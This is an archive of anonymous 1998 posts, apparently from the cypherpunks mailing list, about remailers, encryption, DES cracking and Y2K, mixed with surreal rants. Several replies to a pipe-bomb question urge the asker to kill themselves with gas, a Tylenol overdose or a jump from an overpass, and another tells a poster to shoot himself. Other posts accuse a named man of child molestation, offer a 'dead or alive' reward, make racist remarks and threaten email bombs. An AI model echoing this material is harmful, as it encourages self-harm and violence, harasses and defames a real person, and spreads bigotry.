balancing and/or overcoming the Generic Reality being
written by the more numerous Sheeple following the Scripts written by their Masters.
Women and men who consciously contribute to the daily
construction of Universal Reality influence the basic
structure of the Universe to a greater degree than a greater number of Sheeple who are heading in a different direction, but who scatter back and forth,
being kept only intermittently on course by the dogs
which nip at their heels.
"Let us each choose a Vision,
 Let us each choose a Dream.
 Let us each write a Chapter of Life,
 On our own Silver Screen."
~ 'You Can't Kill A Dream, Or A Dreamer', C.J. Parker
Anyone who wishes to join Tim May in dismissing the preceding as an example of laughable 'Magical Thinking"
having forgetten that Mr. May is simply a senile old fart who can't even find his shoes, is free to do so.
However, no amount of skepticism and derision will change the fact that the sincerely professed insanity
contained in the 'True Story' manuscripts lead to an
incontrivertable confirmation of their validity within
the confines of the MeatSpace time-space continuum running parallel to their release.
Anyone who wishes to avoid facing the reality of what
is being suggested in this rambling missive by a mentally unstable, alcoholic, drug-addicted terrorist
pedophile, in order to preserve the sanity that can
be maintained by dismissing the Truth when it leaks
from the lips of the deranged and depraved, should avoid reading the chapters of 'Space Aliens Hide My
Drugs' which lightly tread the boundaries of Unfortunately, mathematics, biology, physics and psychology are rapidly converging around a model of
the universe which suggests that each and every entity capable of receiving, emitting, categorizing
and acting on information data and processes ranging
from the inherent structure of DNA to convoluted
discourses on Quantum Physics, is not just a 'product' of its universal environment, but also an active 'creator' of that universal environment.
In short, though you may easily dismiss my wild claims that the ramblings of a mad Author are actively
creating the universe which you inhabit, it is highly
unlikely that you will be able to avoid the semi-
sensible posts of Jim Choate to the list concerning
those who are defining the new frontiers of science
with provable theories every bit as nonsensical as
those of Einstien, or be able to ignore the highly
organized trails of hard facts and figures provided
by John Young's website, confirming the bizarre reality of the Author's neurological nightmares and Choate's cutting-edge scientific dreams being brought
to fruitation and manifested in the established MeatSpace chronicles which Dr. Young provides for
the edification of unbelievers, during the functional
periods of lucidity he experiences in between his
mad rampages into the depths of drug-induced insanity.
In effect, those who fail to understand the true import
of the Biosemiotic basis of the conjoined evolution of
mind and matter are doomed to exit this life still
believing that they were predestined to become a side-pocket combination shot of Universal Fats, the
prime mover of all that exists, instead of realizing
that, at any point in time, they were free to change
the nature and direction of the Game (TM) by declaring,
"Damn the CueBall, full speed ahead!"
Uuhhh...I need a drink...

@_date: 1998-04-19 00:52:13
@_author: Anonymous 
@_subject: CA$H REWARD ! 
WANTED / DEAD OR ALIVE!
I will pay a CA$H REWARD for the capture of the Armed Thugs who broke
into my Bienfait residence and stole a variety of computer items,
including a computer, computer peripherals and personal documents.
The CA$H REWARD will be also be paid if those recovering the stolen
items are forced to engage in actions of self-defense, resulting in the
death of the criminals.
Witnesses report that the perpetrators of the crime were dressed to
resemble members of the Royal Canadian Mounted Police, were heavily
armed, and appeared willing to violently attack anyone interfering with
their criminal activity. Their audacity in perpetrating the crime in
broad daylight indicates that they are professional criminals with
little regard for the consequences of their actions.
Suggestions that those of  Native Ancestry would Shoot first, and ask
questions later. should probably be ignored, since it is unlikely that
common criminals harbor the same propensity for  racial violence that is
exhibited by legitimate members of the RCMP.
Any person or persons engaging in the capture of the criminals and the
recovery of the stolen property should take care to avoid violating the
legal or  Charter Rights of the criminals, unless said person or persons
are representatives of an officially recognized law enforcement agency.
                     For Further Information
            Contact: Toto

@_date: 1998-04-20 16:01:22
@_author: Anonymous 
@_subject: Gary Lee Burnore and His Anti-Privacy Zealots are on the Warpath! 
Why don't you just tell you child-molesting friend Gary Lee Burnore that if
he would keep his pants zipped up around the children, he wouldn't need to
hire you to fight his battles.  If he didn't molest a child in Santa Clara,
CA and then move to NC and register as a sex offender, the fact of his
conviction for that crime wouldn't have been published for all to see on
Nort Carolina's public registered sex offender's website, would it?  Just
because you don't like the message, don't shoot the messenger.  This was
the same loud-mouthed Burnore that previously said that republishing
publicly available data to Usenet was acceptable, and that he had nothing
to hide.  Now he's pissed that someone else is following his own example.
Anti-privacy kooks like you and DataBasix CEO Gary Lee Burnore are one of
the best arguments for the existence of anonymous remailers.  You and your
friends at DataBasix have a hard time bullying and harassing people into
silence that you can't identify, don't you?
Lest anyone forget, Gary launched his first tirade against anonymity when
someone tipped off his molestation victim's mother and school officials
anonymously.  Whistleblowing has always been one of the important functions
of anonymous remailers.  Of course, Gary denied the charges and accused the
victim's anonymous benefactor of "harassment" and "libel".  Now the public
record shows that Gary was guilty after all, by his own admission and
guilty plea.
Belinda, if you want to make Gary's "miserable life an absolute hell", why
don't you just marry him?
Now if I really wanted to start a vicious rumor, I'd wonder aloud whether
Raleigh, NC's two most famous resident kooks, Gary Burnore and the Rev.
Steve Winter are really one and the same person!

@_date: 1998-04-20 16:50:29
@_author: Anonymous 
@_subject: Gary Lee Burnore, Convicted Child Molester in Raleigh, NC 
You need to be careful about posting information like that about your
children, especially since there is a registered sex offender, Gary Lee
Burnore , living in your neighborhood.
Why did you post information like that publicly in the first place if you
didn't want people to read it?
Also, it's amazing what people can dredge up on you.  One fellow was harassed
by having a 10 year old California tax lien posted worldwide to usenet in an
attempt to silence his dissenting opinions.

@_date: 1998-04-23 13:27:27
@_author: Anonymous 
@_subject: Position escrow 
Keep in mind that Timothy McVeigh thought he had anonymity with his
use of a prepaid 'anonymous' phone card over public payphones. He was
wrong. The testimony in this regard at McVeigh's trial was 'fixed'--not
in the 'facts' of tracing his identity, but in the 'timing' of tracing
his identity. i.e. - It was made to appear to be a longer and more
difficult process than it truly was.
It is highly unlikely that electronically-based 'anonymous' technology
is going to be any more untracable than meatspace-disseminated tools
of anonymity.

@_date: 1998-04-24 02:39:08
@_author: Anonymous 
@_subject: Traceability of Calling Cards, Phones, Remailers 
It is even easier to track in real-time if one has prior information
in regard to the possessession of such 'anonymous' instruments, either
through in-place informants on either end (or both ends) of the
  Mr. May is astute enough to recognize that law enforcement agencies
are fully capable of reading (or writing) the same guerrila-outlaw
how-to books and manuals available to would-be anonymous activists, and
that it is dangerous for an individual to fail to use their own wit
and wisdom to add additional layers of protection and deception to
guerilla methods commonly championed.
  e.g. - a 'known plaintext' becomes one-step deeper when translated
into an unfamiliar language.
  One should be careful about insulting people named 'Anonymous', since
we come from such a large family...
  Very true, but I was thinking more in terms of the pre-existing
compromise of the tools of anonymity which will be offered/marketed
to the masses.
  e.g. - Decades ago, after picking up a book order from Loompmatics
which I had sent to a cold-address (USPS), I shortly thereafter watched
in amusement as border-guards tore my vehicle apart looking for material
that they theoretically were not supposed to know I had taken possession
of, not knowing that my 'unreasonable' paranoia had resulted in my making a 'test run' before crossing the border with them.
 > I had hoped there would be many more remailers in use by the time the
  There are many more remailers in existence than is readily apparent.
The Winsock remailer software, for instance, has been modified to
allow 'clustered' remailers to exist on a single server, wherein a
number of individuals can channel their email to a separate in-house
remailer designed to give them an outgoing consistent persona that
is not traceable to their incoming message through ordinary man-in-
the-middle tracking.
Totoally Anonymous

@_date: 1998-04-24 02:40:43
@_author: Anonymous 
@_subject: Epilogue 5/0 -- SPACE ALIENS HIDE MY DRUGS!!! 
Epilogue 5/0 -- SPACE ALIENS HIDE MY DRUGS!!!
A REPTILIAN NAZI WHO NARROWLY ESCAPED BEING MADE
INTO A PAIR OF BOOTS WHILE TRAVELLING THROUGH
  Wow. You must have been some sick puppy...
It was this very Prince Apia of Physics that allowed Linda McCartney to
be secretly buried as an imaginary driver in the log book of a finely
tuned Volkswagen with a fifth-wheel which could be retracted when
outside the jurisdiction of the Kansas Control Commission, thus allowing
the Bug to be hidden outside of the prying blinds of the papparazzi,
whose long, reptilian tongues were busy snapping at fruit's flies.
  Ayn Rand's 'propaganda' apparently didn't shield us well enough from
herd-responses to keep her books off of the best-seller lists, while
*real* classics such as 'Thinker Dumped' were used to prop up the corner
of couches around the nation.
  However, one needs to keep in mind that top government officials and
members of the military are being provided innoculation to provide them
with resistance to the cultures that they experiment with, while making
them illegal for the average bean-counter to possess.
  Lack of public support does not seem to prevent the regulation-mongers
from continuing their various forms of the War on Drugs over the course
of hundreds of years, while imprisoning and killing large numbers of
citizens, in the process.
  And I don't know anyone in a child-sex ring...INCLUDING those who only
hold them down...who think this is a legal activity. Friends of yours
who have gone on missions to assist in child-seizing have outright
stated that they were going to watch for holes in the condoms being
used. "If it saves the life of a single child..."
  I've been keeping my head in glass canning jars, and so far I have
enough saved up to hold out for forty days and forty nights if the Y2K
Volkswagen results in a shortage of Tequila, Kahlua and Cream.
  I, and countless other citizens, are fully capable of dealing with the
REAL threats which life serves up on a daily basis. The 'imagined'
threats are the ones that truly need to be guarded against, as they are
the ones that the Oppressor uses most effectively to crush both the
spirit and verse of the Constitution.
  Well, I am rather thin-skinned, but at least I'm not thin-scaled...
  Some of the more mentally unstable of those indivdiduals actually
believe that they are receiving secret messages through their
televisions from large-breasted women who are attempting to sell them
fast cars, toothpaste and other consumer goods.
  Certainly not as much as the 'large' organized conspiracies...
Tossing a golden lager marked "Pilsner",

@_date: 1998-04-24 07:37:44
@_author: Anonymous 
@_subject: Cutoff Date 
MISSISSIPPI LEGISLATURE
1998 Regular Session
By: Representative Moak
                              House Bill 196
AN ACT TO AUTHORIZE THE REMOVAL OF A BODY PART IN LIEU OF OTHER
SENTENCES IMPOSED BY THE COURT FOR VIOLATIONS OF THE CONTROLLED
SUBSTANCES LAW; AND FOR RELATED PURPOSES. BE IT ENACTED BY THE LEGISLATURE OF THE STATE OF MISSISSIPPI:
SECTION 1. In lieu of any other penalty prescribed by law, the court may
allow any person who is
convicted for a violation of the Controlled Substances Law to have a
body part removed. The
convicted person and the court must agree on which body part shall be
SECTION 2. This act shall take effect and be in force from and after
July 1, 1998.

@_date: 1998-04-28 15:37:06
@_author: Anonymous 
@_subject: Gary Lee Burnore and His Anti-Privacy Zealots are on the Warpath! 
Your own record of harassing remailers is well known, McClatchie.  Calling
remailer users "assholes" and calling for content-based censorship only
underscores your anti-privacy agenda.  If remailer users posted only what
was popular and politically correct, there would be little need for
One remailer operator who was forced to shut it down mentioned your name
quite prominently, BTW, in providing details about the attack.
Can you document this?
 I never read a single post from anyone claiming to
speak for Wells Fargo management which has substantiated this.  Nor did
any of the remailer operaters involved mention having received such an
official complaint from member of Wells Fargo's management.  So all we
have is you parroting Burnore's original unsubstantiated allegations.
Isn't it interesting that when something offends Gary Burnore he often
resorts to "defending" phantom victims of the alleged "abuse"?  And shortly
thereafter, various of his sock puppets echo his whining chant.
And one such post contained Gary Burnore's own .sig block still appended to
an otherwise anonymous post.  Oops!
Please cite the NC law which you claim is being violated, and how it would
apply to a remailer located outside of NC?  Would you also say that
remailers ought to censor their content to avoid other laws being broken,
such as insulting the religion of Islam, publishing information about birth
control, abortion, etc.?  If not, why should a foreign remailer selectively
enforce this one law in NC (if it even exists)?
Telling people that the website exists and that a search for "Gary Lee
Burnore" on it might yield a match is not more "harassing" than the site
itself.  If they didn't want people to access this data, why publish it on
a public website?  The whole purpose of the website it apparently to let
people to know who the registered sex offenders are in NC and where they
If someone snail mailed you something you considered "harassing" and
included no return address, would you accuse the sender of trying to get
the postal service shut down?
Wow, McClatchie.  I guess you have a point.  If you and Gary claim that all
that happened, and that it was done by someone outside of DataBasix, then I
guess we should believe it and shut down all the remailers just to make
sure they aren't abused...
But the fact is that all too often in the past, designer "abuse" would just
automagically appear at critical times when Gary Burnore and Belinda Bryan
were making demands (privately, via e-mail) on another remailer operator.
How would someone outside of DataBasix have known that?  How would someone
other than a DataBasix insider have gotten access to the complete list of
DataBasix' clients and employees in order to allegedly "spam bait" them, as
Belinda claimed?  Your own involvement in all of these attacks seems to
more than just coincidental.
Speaking of abuse and harassment, Gary Burnore demanded that Jeff Burchell
turn over to him all of his remailer logs containing the e-mail addresses
of everyone who had either sent or received anonymous e-mail through the
server.  Yet Gary refuses to disclose how such a list would have been used.
Fortunately for the remailer user community, no such data was ever
Most women would not consider it "harassment" to be informed that their
daughters were being molested.  Nor did she complain.  Gary did!  How nice
of the perpetrator to be so considerate of his victim's mother and not want
to have her "harassed" by knowledge of what Gary was doing to her daughter.
Ignorance is bliss, huh?
Gary's motives were finally revealed when he was CONVICTED for that very
crime.  How would a random harasser have even known of Gary's sexual
activities involving minors, before he was arrested and convicted?  How
would he/she know the victim's gender, age, identity, and city of
Apparently so, when the perpetrator of the crime is the only one who
complains about being exposed.  In case it has escaped your attention, Gary
complained PUBLICLY about a PRIVATE e-mail message to his victim's mother.
If telling a mother that her daughter is being molested isn't
whistleblowing, what is?
TRANSLATION: Anything with which the fine folks at DataBasix disagree tends
to be called "harassment" and "abuse".  As for intent, the accuser has the
burden of proof, there.
But consider this: if even mentioning Gary's sexual activities with minors
is "vile", what does that make Gary for actually committing them?

@_date: 1998-04-28 21:32:06
@_author: Anonymous 
@_subject: Anonymity, FC '98, and escrowed paper shredders 
Most interesting from a cypherpunk point of view.
"Matt Blaze expressed an interesting analogy in describing a paper
shredder that created a digital copy of a document and sent it off to
a central database. When a document was accidentally shred, the user
could contact the database and have a copy faxed."
Mentions of anonymity contain an anonymous poster to cypherpunks, an
anonymizer inside the FBI's intrusion detection program, AAAS proposal
to use remailers to defend human rights, toll collection and mass
surveillance in New Jersey, trustees and anonymity-revocation in
payment schemes, policy issues for anonymizing services and discussion
of onion routing at a spookish security conference.
Finally, good manners or not, here's Paul Syverson's must-read item on
FC '98 for those of us who couldn't go:

@_date: 1998-08-01 00:36:23
@_author: Anonymous 
@_subject: CypherPunks Are Stupid DickWads!!! 
Ha! Ha! Ha!
I can say anything I want about you guys and you won't know who I am,
because I am using an AnonymousRemailer (TM).
How does it feel to have your own CypherPunksTechnology turned against
you, eh?
And there's nothing you can do about it, because you don't know who I
Hell, I can even badmouth the remailer operators, while using their own systems to send out my email badmouthing them, eh?
I mean, these RemailerOperators are really stupid lamers, eh? I mean,
can't even get their messages to come out in the same order that they
came in by...
  Dumb, eh? Some of the test messages I sent to myself came back in a
different order from that what I sent them in. I guess these guys don't
know much about computers, eh?
  And those names, 'Anonymous' and 'Nobody', aren't fooling AnyBody,
because the minute you see them, you *know* that the message is
from a remailer.  Dumb, eh?
  Well, I just thought I'd let you guys know how stupid you are and how
you'll never know who I am, or how to find me, because I am cutting the
edge off of computer technology.
p.s. - It's a damn good thing you can't find me, neither, because my
     new email account is on a system that is so straight that my
     email is automatically scanned for BadWords before being sent
     out, and I have to either use misspelled BadWords like Phuck,
     BadWords which aren't in the BadWordDictionary, like DickWadd,
     or send the chapters of SPACE ALIENS HIDE MY DRUGS!!! to
     the CypherPunks Disturbed Male LISP couched and potatoed in
     ConvectionalEncraption.
                          *** The Fire House Inn ***
                                 Come visit us
                               Telnet: fhouse.org
                                WWW:  fhouse.org
                                  ***********

@_date: 1998-08-01 07:01:03
@_author: Anonymous 
@_subject: CypherPunks Are Stupid DickWads!!! 
NO>  Well, I just thought I'd let you guys know how stupid you are and how
NO>you'll never know who I am, or how to find me, because I am cutting the
NO>edge off of computer technology.
NO>                          *** The Fire House Inn ***
NO>                                 Come visit us
NO>                               Telnet: fhouse.org
NO>                                WWW:  fhouse.org
NO>                                  *********** It looks like Toto has made fools of us again. Damn he is smart!
                          *** The Fire House Inn ***
                                 Come visit us
                               Telnet: fhouse.org
                                WWW:  fhouse.org
                                  ***********

@_date: 1998-08-01 11:55:16
@_author: Anonymous 
@_subject: CRTC asks if it should regulate the internet 
The front page of today's Globe & Mail has a story about the CRTC
asking if it should regulate the Internet.
The front page story directs you to page A4 for the remainder, which
is actually on page A3.
On page A3 an incorrect URL for the CRTC releases.  The correct ones
All EFC members should write and say they are opposed to CRTC regulation.
Unfortunately, I am scheduled to leave for vacation tomorrow, but David
Jones will post this and perhaps suggest some sample letters to write
to the CRTC.
EFC will plan to attend the public hearings on the issue on November 23
in Hull, Quebec.  Jeffrey Shallit

@_date: 1998-08-03 06:03:26
@_author: Anonymous 
@_subject: question... 
If those two don't work try:
this will give you a long list of hacking texts.  Scroll down to 1-4
and 1-5 on how to get spammers kicked off their ISP :)
DO YOU YAHOO!?
Get your free  address at

@_date: 1998-08-03 06:15:22
@_author: Anonymous 
@_subject: Question.... 
If the Encryption is done on a device attached to your computer
instead of in software on your computer.
Depends on the device.  But most require some effort.
Key Escrow is an action taken by the government to collect or gain
access to private keys.  There was some controversy as to the clipper
chip which is hardware falling prey to key escrow however.
DO YOU YAHOO!?
Get your free  address at

@_date: 1998-08-03 19:06:09
@_author: Anonymous 
@_subject: No Subject 
Oh, it's sick anyhow...
A couple excerpts from jya's transcript:
On the EFF DES cracker: Now, I need to explain first of all, that the
government is currently permitting the export of 56 bit encryption
algorithms.  Now, I know that there's some huffing and puffing about
whether that's strong encryption or not. But again, I say let's put this
in context.  There was a flap here the other day when, ta-da, somebody
invented a computer that could break 56 bit encryption in 30 hours or 40
hours or whatever the time was, right.  You took 40 hours to decrypt a
two-second message.  And it was good only for that one message.  You've
got to start all over again on the next two-second message.  Tell me that
that isn't strong encryption.
[Secretary Hamre, that isn't strong encryption. Weak enough that cracking
DES keys for two grand each -- reasonable price considering some of the
applications using DES -- can be a viable business for the shady hacker
type, in fact. Pays for your parts in ten months, pocket most everything
else until the machine breaks.]
On export controls: "...I'd also ask American business not to make a
campaign out of just trying to bust through export controls as though
somehow there was a God-given, inherent right to send the strongest
encryption to anybody in the world, no matter who they are.  I don't agree
with that.  I will never agree with that."
["I will never agree with that" -- I'd say we're talking to an open-minded
individual who's really trying to work things out, eh?]

@_date: 1998-08-04 22:20:20
@_author: Anonymous 
@_subject: of Re: of the dickwads thing... 
I hope it can't be tracked, even by the operators.  That is the point
of making it anonymous. :)
I take no offense to a post suck as this. The sender obviously knows
almost nothing of the remailers,  letters coming out in a different
order preserve untracability.  The point for the names such as
Anonymous and Nobody are so you know it's  an anon remailer, there is
no reason to hide it and it helps to identify them.  If you want to
hide it you can.
in a
DO YOU YAHOO!?
Get your free  address at

@_date: 1998-08-05 01:03:54
@_author: Anonymous 
@_subject: Question on secure programs 
I'm sitting here browsing through my copy of applied cryptography and
I start to think.  How long will my 2047 bit PGP key be secure?  When
I look for secure I don't mean my family or the occasional hacker.  I
mean like a martial law state.  DES 56bit can be cracked in days or
hours,  public key cryptography is substancially easier to break than
symetric cryptography such as DES.  I want to get the best encrytion I
can so that one day when my computer is dug out of the ground and put
in an exibit at a college they still can't break my key.  I understand
my key is secure now, but what about in ten years when I'm famous and
my history is worth a mil? :)
Is mit still developing Mit PGP? or is 2.6.2 the last free version of
PGP that we will ever see?  DO YOU YAHOO!?
Get your free  address at

@_date: 1998-08-05 01:19:15
@_author: Anonymous 
@_subject: SecDrv and Win95 
I'm looking for a good HD encryptor.  The best one seems to be secdrv,
 Is this compatoble with win95? I'm asking because I know secdrv uses
tsr programs and drivers, but I am not familiar enough with win 95 to
be sure they will work together.  In win programming you don't use
interrupts and I'm sure that the drivers try to capture interupts. it
could still work if win95 calls int's to do it's work though.  Any info?
DO YOU YAHOO!?
Get your free  address at

@_date: 1998-08-06 08:01:10
@_author: Anonymous 
@_subject: text analysis 
A good data structure is a tree:
                   ----->  2nd letter
                  /                    ------> 3rd letter
                 /                    /
      1st letter ------->  2nd letter -------> 3rd letter
                 \                    \
                  \                    ------> 3rd letter
                   ----->  2nd letter
                                      \
                                       -----> 3rd letter
Start with an array indexed by the 26 letters.  Each array entry contains
a count of that letter's frequence and a pointer to a subsidary array.
The pointer starts out null.
When you find a new digraph (like the first time you find a letter after
'g') you allocate a new structure to represent the letters following 'g'.
This will again consist of 26 entries like the first one.
Likewise when you find a new trigraph, you allocate a new third-level
array of 26 entries.
This will be a compromise between space and speed.  Most digraphs don't
exist so you will save considerable space over the brute force way of
allocating an array of 26^n spaces to count n-graphs.  However it is
a bit wasteful in that it allocates a full 26 entries each time even
though only a small fraction will be used.
The last layer does not need to have the pointers allocated per letter
since you won't be looking beyond that (e.g. if you are only interested
in counting trigraphs, the third layer above can consist of just an
array of counts).
struct entry {
} top;
Handle letter, given array of previous letters.  prev[0] is current
letter, prev[1] is 1st previous letter, prev[2] is 2nd previous letter,
etc.  Size of prev is n entries.  Letters are normalized to range 0-25.
Untested code, hopefully it will give you the idea.
handle (int prev[], int n)
this when you print them out.  Or you can store the letters in the prev
array in the opposite order, putting the current letter in prev[n-1],
then they will be in the correct order.

@_date: 1998-08-06 21:43:51
@_author: Anonymous 
@_subject: No Subject 
That all depends on the Anonymous you are talking to.
If I did this right It will come out of the remailer as TBM so I'm not
just another anonymous :)
DO YOU YAHOO!?
Get your free  address at

@_date: 1998-08-06 21:50:23
@_author: Anonymous 
@_subject: whut up 
Whut up dawg??? we be dim k-rad k3wl CyPhErPuNk d00dz!! we be havin' no
band stickerz. we be learning Ebonics (what it is, man!) so we can be
rappin' with looserz like you! What it is, man!
we be chargin' $99.99 of green to make deez band stickaz! What it is, man!

@_date: 1998-08-06 22:21:53
@_author: Anonymous 
@_subject: Is there a freeware knockoff of SSH for win95 
I'm looking for something to encrypt all of my web browsing while I am
at work.  My work keeps a couple gigs devoted to a cache file in the
proxy and I want to find a cheap way around that for my work. Personally paying for Fsecure SSH is not worth it just for work.
I would be wiiling to pay for an account at cyberpass.net for their
ssh server but the software is way too much.
DO YOU YAHOO!?
Get your free  address at

@_date: 1998-08-07 16:11:59
@_author: Anonymous 
@_subject: SecDrv and Win95 
"Deep Crack" was invented in 1993 by John Gilmore. (based on a paper at Eurocrypt '93).
It was implemented more recently.
BTW this is all in the archives in 1993. Everything was discussed in the first
12 months of cypherpunks.

@_date: 1998-08-07 21:01:11
@_author: Anonymous 
@_subject: Tim caught rehashing from Archives 
Tim's thoughts on the archives are all the more ironic for being rehashed
from "the good old days (TM)".
--- forwarded article -------------------------------------------------------
Received: by toad.com id AA03391; Thu, 6 Jan 94 16:00:13 PST
Received: by toad.com id AA03329; Thu, 6 Jan 94 15:55:35 PST
Return-Path: Received: from crl.crl.com ([165.113.1.12]) by toad.com id AA03317; Thu, 6 Jan 94 15:55:27 PST
Received: by crl.crl.com id AA29063
  (5.65c/IDA-1.5 for cypherpunks at toad.com); Thu, 6 Jan 1994 15:54:06 -0800
     I realize we're all supposed to smile knowingly at this cynical remark;
but I can't let the cynicism pass without a commentary. If the list is advanced, then the issues being discussed may strike newbies as arcane -- this is noise only to the uninitiated. And repeated threads may strike old-timers as rehash -- and therefore a kind of noise.  But -- at least as far as Cypherpunks goes -- even apparently repetitive threads have new slants, unforeseen shadings of personal meaning, and new contexts to save them from being considered as just noise.
  "The main cause of failure in education," said A.N. Whitehead, "is staleness." And a stale reader will hear only noise if the attention isn't focussed enough to see the actually new within the apparently old.

@_date: 1998-08-09 11:46:40
@_author: Anonymous 
@_subject: Is there a freeware knockoff 
Oh, man! That's what I want to know! How do _you_ get off
this mailing list? The question of the day, isn't it? Anyone
who uses "cyber" in near proximity to "punks" is automatically
disqualified from being on this list. So how did you slip in
here? You're here, but unfortunately getting off/out is not
so easy. I could suggest that you withdraw all your savings
and buy a clue, but that would obviously be futile in your
You should probably contemplate your navel and how you got _onto_ the list, for oh, say, three hours. If enlightenment doesn't come, you might try eating a handful of castor beans. I've heard that aids digestion. Not yours, of course, but it
will no doubt ease the pains of the rest of the list
If you're still troubled by list membership after that, you
might try the old tried and true solution for undesired list
problems: shoot yourself in the head.
If that doesn't work, try a larger caliber.
If that doesn't work, try loading the gun first.
HelpfulListInfoMonger II

@_date: 1998-08-12 13:25:57
@_author: Anonymous 
@_subject: No Subject 
From high-tech privacy to low-tech politics, Clinton's
                video testimony raises novel issues. There is the basic matter
                of preventing electronic eavesdropping, a presumed concern
                of all the parties and one that will require the use of
                sophisticated encryption technology. There is the political
                consideration that, under certain circumstances, tape of
                Clinton's testimony could end up in Republican attack ads or
                television news shows.
"An armed society is a polite society." - Robert Heinlein

@_date: 1998-08-13 09:21:38
@_author: Anonymous 
@_subject: No Subject 
'What are you going to do, classify prime numbers?'
'There are a thousand reasons to have this with you, but mostly its for the
we can't think of' 'What interests me is that it recorded 18 hours of static...'
------All quotes from _Contact_

@_date: 1998-08-14 08:58:12
@_author: Anonymous 
@_subject: No Subject 
CLINTON/STARR SCRAMBLED Wed Aug 12 1998 23:34:51 UTC-- An extraordinary communications security
blanket will be in place
for President Clinton's grand jury showdown on Monday. One of the hottest
telecasts in American
history will be scrambled with the latest encryption technology and put on
a special fiber-optic
line from the White House to the courtroom, the DALLAS MORNING NEWS reports
in Thursday editions. Hacker beware: Intercepting the president's testimony could fall under
wiretapping statutes as a
felony, reports the paper. Tech workers, claiming to be from a Virginia cable company, visited the
federal courthouse early
week. One court watcher explains that the cover didn't work: "It was
obvious that the guys were not
with 'Virginia Cable' but were from the FBI or some other government
agency... setting it all up." Starr is expected to personally question Clinton during the session... "[T]errorists are the only true avant-garde artists because they're the
only ones who are still capable of really surprising people." (Delillo q.v.
Laurie Anderson 1994: 222)

@_date: 1998-08-18 14:21:59
@_author: Anonymous 
@_subject: No Subject 
I have a special.  If you line up behind my foot, I'll boot you in the ass
all the way to any of the places mentioned.  Free of charge.  Does
that sound like a good special?  The best things in life are free, like
a foot shoved in your ass.  Wouldn't you agree?

@_date: 1998-08-19 18:28:46
@_author: Anonymous 
@_subject: Pipe 
Go blow yourself (up) and stay away from those of us who actually have a

@_date: 1998-08-19 19:19:57
@_author: Anonymous 
@_subject: email travel information 
I find that having a friend tie you to the train tracks immediately before
a train comes works well for travelling long distances. You might not wind
up where you wanted, but instead may wind up in Spammer Hell, but one has
to start somewhere.

@_date: 1998-08-19 20:50:20
@_author: Anonymous 
@_subject: Pipe 
Well, first you get a big, long pipe. You cut a hole in the top to let
some oxygen in. Attach one end to the natural gas line, and stick your
head in the other end. Turn on the gas. Wait about a minute, then drop a
match into the hole at the top and congratulations, for you've reached a
different and greater incarnation. Remember: Inhaling natural gas won't normally kill you, and it needs
oxygen to burn. So you have to blow it up. Instant pipe bomb.

@_date: 1998-08-20 23:12:23
@_author: Anonymous 
@_subject: No Subject 
The first step is to swallow an entire bottle of Tylenol.  Then, to be
certain of your resilience (you have to be quite resilient to build a pipe
bomb), find the nearest highway overpass and jump off of it.  These
steps are crucial precursors to building a pipe bomb, and are much
more effective if you carry them out as soon as possible.  Like right
Hope this helps.

@_date: 1998-08-21 16:16:53
@_author: Anonymous 
@_subject: Pipe 
[Porker's lame quoting style retained.]
So use an ISP which doesn't have the horrible reputation that AOL and its
users have earned. You continue the grand AOL tradition of spreading
lameness throughout the Internet. Because AOL is now "32 bit" (oh brother) AOL users are suddenly not
idiots. Right. I guess all the AOLholes who were posting requests for LSD
manufacturing, hacking banks, and band stickers were using "16 bit AOL." The number of bits AOL's software uses has nothing to do with it. AOL gets
ragged on because their (publishing to the Internet) userbase is composed
mostly of total morons and because they go try to sign up every idiot they
can find with a "50 hours free stupidity/spamming fest" disk. Their
software is designed to allow a trained chimp to use the Internet, and -
surprise, surprise - that's what we get most of the time.
Of course not *all* AOL users are idiots, but enough are to make the
stereotype valid.
If AOLers want to stop being made fun of, then get AOL to stop catering to
every moron they can find and saying "AOL is the Internet." Stop using
this lame and annoying "<< >>" quoting style. (Before somebody jumps on
that, there have been at least four or five Cypherpunks who have
publically bitched about it here and other people have complained about it
elsewhere.) Stop posting requests for music, band stickers, books, pipe
bombs, hacking info, and other such junk to mailing lists where it's
inappropriate and to inappropriate USENET newsgroups. At least try to put
some effort into formatting your posts so that they don't have line breaks
in bizarre places, don't underuse or overuse punctuation, and try to use
some proper capitalization.
AOL brought this on themselves. At least they send me free coasters and
mirrors every other week. If it wasn't for the very rare useful post from AOL, I'd have my system
killfile mail from AOL going to the Cypherpunks list like I do for my
normal inbox.

@_date: 1998-08-24 15:11:09
@_author: Anonymous 
@_subject: No Subject 
Would you kindly shut the fuck up already?  Thanks.
<6ijaq3$bb1 at news1.panix.com>,

@_date: 1998-08-25 20:34:11
@_author: Anonymous 
@_subject: Is hate code speech? 
Oh, I don't know. After all, we all know that blacks are so descriminated
against. That's why we "need" such things as quotas, affirmative action,
"dumbing down" of test scores, special versions of standardized tests for
blacks, ebonics, and other such great ideas. Therefore, analyzing the
government party line, it is perfectly reasonable to have assumed that
blacks would always be so descriminated against as to never get hired for
such a position.

@_date: 1998-08-26 10:40:57
@_author: Anonymous 
@_subject: No Subject 
My online review of this list and others.
Mary Ellen Zurko
"We will be obliged to take action ourselves" -Gore on privacy

@_date: 1998-08-26 19:37:17
@_author: Anonymous 
@_subject: LACC: Re: Is hate code speech? 
That's why I'm not wrestling with you. I'll just get dirty, and you'll
enjoy it.

@_date: 1998-08-31 09:41:48
@_author: Anonymous 
@_subject: No Subject 
We don't take kindly to racial slurs here.  You'll probably be receiving
hundreds of email bombs over the next few days from angry
cypherpunks.  You may want to change email accounts.
God bless!

@_date: 1998-12-02 00:38:49
@_author: Anonymous 
@_subject: NZ or LA in Y2K 
When the power goes out, the rioting and looting starts
in the cities.  (This isn't New Zealand, baby, this is LA)
When the rioters get bored, they'll get into cars.
When they run out of gas, they'll stay where they are stranded
as the gas pumps don't work.  Some fine huntin' then, bubba.
   Mr. Moisin-Nagant

@_date: 1998-12-02 07:39:08
@_author: Anonymous 
@_subject: y2k+oil refineries 
North's "scrap the refinery, the chip broke" scenario was forwarded to
comp.software.year-2000 by Paul Milne, resident doomsayer, foul-mouthed
religious fanatic, economic Marxist, and all around kook.  It prompted a
very knowledgable reply which pointed out how silly the whole idea was,
from someone with relevant experience.  Maybe next time Detweiler could
check c.s.y2k to filter out North's nuttier ideas before forwarding
them here.
Author: SAG
Email: stephen.and.marilyn.goldstein at worldnet.att.net
I'm not sure if I want to play this game Mr. Milne -- you offer this
article which is, conjecture, innuendo and supposition but demand that
any counter story be documented by "evidence."  That's pretty tough and,
frankly, I'm not up to the task as my knowledge is with electric power
plants -- not oil refineries.
They do, of course, share some important characteristics and so I'll
give it a try.  The approach will be from two perspectives -- first,
I'll explain some power plant construction practices that contradict the
